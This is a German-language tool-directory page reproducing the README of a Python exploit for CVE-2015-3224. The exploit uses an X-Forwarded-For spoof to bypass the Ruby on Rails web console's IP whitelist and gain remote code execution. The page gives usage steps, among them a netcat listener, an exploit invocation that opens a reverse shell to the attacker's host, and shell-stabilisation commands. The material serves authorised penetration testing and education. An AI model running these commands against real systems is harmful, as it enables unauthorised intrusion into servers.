Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2015-3224 — Ruby on Rails Web Console Exploit (CVE-2015-3224) | Kitploit
Tools/GitHubGitHub/sic4rio/cve-2015-3224
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Ruby on Rails Web Console Exploit (CVE-2015-3224)

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ruby on Rails Web Console Exploit (CVE-2015-3224)

CVE-2015-3224

Dieses Repository enthält ein Python-Skript, um eine IP-Whitelist-Umgehungs-Schwachstelle in der Entwickler-Webkonsole von Ruby on Rails 4.0.x und 4.1.x auszunutzen. Das Skript ermöglicht das Ausführen von entferntem Code auf anfälligen Servern.

⚠️ Haftungsausschluss Dieses Skript ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Verwenden Sie es nicht auf einem System ohne ausdrückliche Erlaubnis. Die Autoren sind nicht verantwortlich für jeglichen Missbrauch oder Schäden, die durch dieses Skript verursacht werden.


📌 Beschreibung der Schwachstelle

Die Webkonsole in anfälligen Versionen von Ruby on Rails ist für Entwicklungszwecke gedacht und sollte nur von vertrauenswürdigen IP-Adressen aus zugänglich sein. Aufgrund einer fehlerhaften Behandlung des X-Forwarded-For-HTTP-Headers kann ein Angreifer jedoch seine IP-Adresse fälschen, um als vertrauenswürdiger lokaler Benutzer zu erscheinen (z. B. 127.0.0.1 oder ::1). Dies umgeht die IP-Whitelist und gewährt unbefugten Zugriff auf die Webkonsole, was zu entfernter Codeausführung führt.


🚀 Funktionen

  • Einfach zu bedienen: Einfache Befehlszeilenschnittstelle.
  • Dynamische Pfaderkennung: Durchsucht das Ziel automatisch, um den dynamischen Konsolensitzungspfad zu finden.
  • Zwei Shell-Modi:
    • Einfache Shell: Eine einfache, nicht-interaktive Shell für schnelle Befehle.
    • Reverse-TTY-Shell: Ein Einzeiler-Befehl, um eine vollständig interaktive PTY-Reverse-Shell zu erhalten.
  • Verbesserte Lesbarkeit: Farbcodierte Ausgabe für Statusmeldungen, Erfolge und Fehler.
  • Robust: Beinhaltet Fehlerbehandlung für Netzwerkprobleme und fehlgeschlagene Befehle.

✅ Voraussetzungen

  • Python 3
  • requests-Bibliothek

Installieren Sie requests:

root@kitploit:~
pip install requests

⚙️ Verwendung

  1. Das Repository klonen:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <repo-verzeichnis>
    
  2. Das Skript ausführbar machen:

    root@kitploit:~
    chmod +x exploit.py
    

Option 1: Einfache interaktive Shell

Dieser Modus eignet sich zum Ausführen schneller, einfacher Befehle.

root@kitploit:~
./exploit.py -t http://<ZIEL-IP>:<PORT>

Option 2: Vollständig interaktive TTY (Reverse Shell)

Dies ist der empfohlene Modus für eine stabile, vollständig interaktive Shell.

Schritt 1: Starten Sie einen Listener

Öffnen Sie auf Ihrem lokalen Rechner ein neues Terminal und starten Sie einen netcat-Listener.

root@kitploit:~
nc -lvnp 9001

Schritt 2: Führen Sie das Exploit aus

Führen Sie in einem anderen Terminal das Skript mit dem Flag --rev-shell aus und geben Sie Ihre lokale IP (lhost) und Ihren Port (lport) an.

root@kitploit:~
./exploit.py -t http://<ZIEL-IP>:<PORT> --rev-shell --lhost <IHRE_IP> --lport 9001

Schritt 3: Stabilisieren Sie die Shell

Eine Verbindung wird bei Ihrem netcat-Listener eingehen. Um sie zu einer vollständig interaktiven TTY aufzuwerten, führen Sie im netcat-Fenster die folgenden Schritte aus:

  1. Die Shell in den Hintergrund versetzen, indem Sie Strg+Z drücken.
  2. Stellen Sie Ihr lokales Terminal in den Raw-Modus und holen Sie die Shell in den Vordergrund.
    root@kitploit:~
    stty raw -echo; fg
    
    Drücken Sie die Eingabetaste, wenn die Eingabeaufforderung nicht wieder erscheint.
  3. Legen Sie die Terminal-Eigenschaften auf der entfernten Shell fest.
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

Sie haben jetzt eine voll funktionsfähige und stabile Shell!


👥 Danksagungen

  • Original Exploit: Eval (@0xEval)
  • Die Datei Readme.md: GPT
Tool herunterladen